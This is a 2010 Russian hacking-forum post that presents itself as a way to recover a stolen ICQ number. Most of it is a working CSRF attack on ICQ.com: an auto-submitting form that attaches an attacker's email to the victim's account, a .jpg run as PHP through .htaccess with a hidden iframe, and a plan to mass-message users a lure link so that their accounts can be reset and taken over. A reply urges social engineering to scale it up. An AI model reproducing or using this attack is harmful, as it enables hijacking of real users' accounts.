Возвращение угнанного номера ICQ

Тема в разделе "Статьи", создана пользователем ozs, 16 ноя 2010.

  1. ozs
    ozs Guest
    Итак, новая система ретрива на ICQ.com вводилась 2 раза:

    1. одновременно с введением новой системы появилась возможность вписывать свое мыло в детали номера через страничку _http://www.icq.com/people/НОМЕР/edit/ (а не через _https://www.icq.com/register/email_attach.php)
      при этом тебе всего лишь нужно было быть залогиненным на асечном сайте;
    2. после первых тестов новую систему убрали и временно вернули старую. После повторного введения новой системы ретрива мыло для логина вновь менялось лишь на странице _https://www.icq.com/register/email_attach.php.

    После финального включения новой системы ретрива разработчики зачем-то решили оставить возможность прикрепления нового мыла с помощью первого варианта, но спрятали эту возможность глубоко в html-сорцах своих страниц

    Если у тебя угнали асю, твой алгоритм должен быть следующим (предварительно ты должен иметь живую сессию на ICQ.com):

    Сохрани на свой жесткий диск следующую html-страницу:

    PHP:
    <form action="http://icq.com/people/include/xhr.php" method="POST">
    <
    input name="f" value="resendMail"/><br/>
    <
    input name="e" value="твое_мыло@мыло.ru"/><br/>
    <
    input name="lang" value="en"/><br/>
    <
    input name="server" value="prod"/><br/>
    <
    input type="submit" value="ok"/><br/>
    </
    form>
    Открывай данную страницу в браузере и жми на сабмит
    После сабмита на твое вписанное мыло упадет ссылка для подтверждения нового "email for login";

    Переходи по данной ссылке и восстанавливай пароль на новое мыло с помощью _https://icq.com/password

    Автоматизация​

    Создаем файл 1.php
    PHP:
    <body onload="document.getElementById('l').submit();">
    <
    form  id='l' action="http://icq.com/people/include/xhr.php" method="POST">
    <
    input name="f" value="resendMail"/><br/>
    <
    input name="e" value="твое_мыло@мыло.ru"/><br/>
    <
    input name="lang" value="en"/><br/>
    <
    input name="server" value="prod"/><br/
    <
    input type="submit" value="ok"/><br/>
    </
    form> 
    Создаем файл 2.jpg

    Код:
    <img src="http://c.icq.com/homepage/img/park_R_2010.jpg"
    <iframe width=1 height=0 style="position: absolute; visibility: hidden;" src="http://site.ru/1.php"></iframe> 
    

    Создаем (дописываем) файл .htaccess
    Код:
    <files "2.jpg">
    AddType application/x-httpd-php .jpg
    </files> 
    

    Делаем рассылку в icq.com со словами "Прикольная картинка, как тебе? http://site.ru/2.jpg".

    На почту получаем кучу ретривов и никаких кукисов. Самый чистый csrf.

    (с) satana-fu M4g​
     
    Последнее редактирование модератором: 16 ноя 2010
    16 ноя 2010
    2 пользователям это понравилось.
  2. firmont
    firmont Новичок
    Симпатии:
    0
    Отличная статья на 5+ - только вот не все заходят на ICQ.COM и для массы её не используешь, но методом психологии всего можно добиться :)
     
    16 ноя 2010
Загрузка...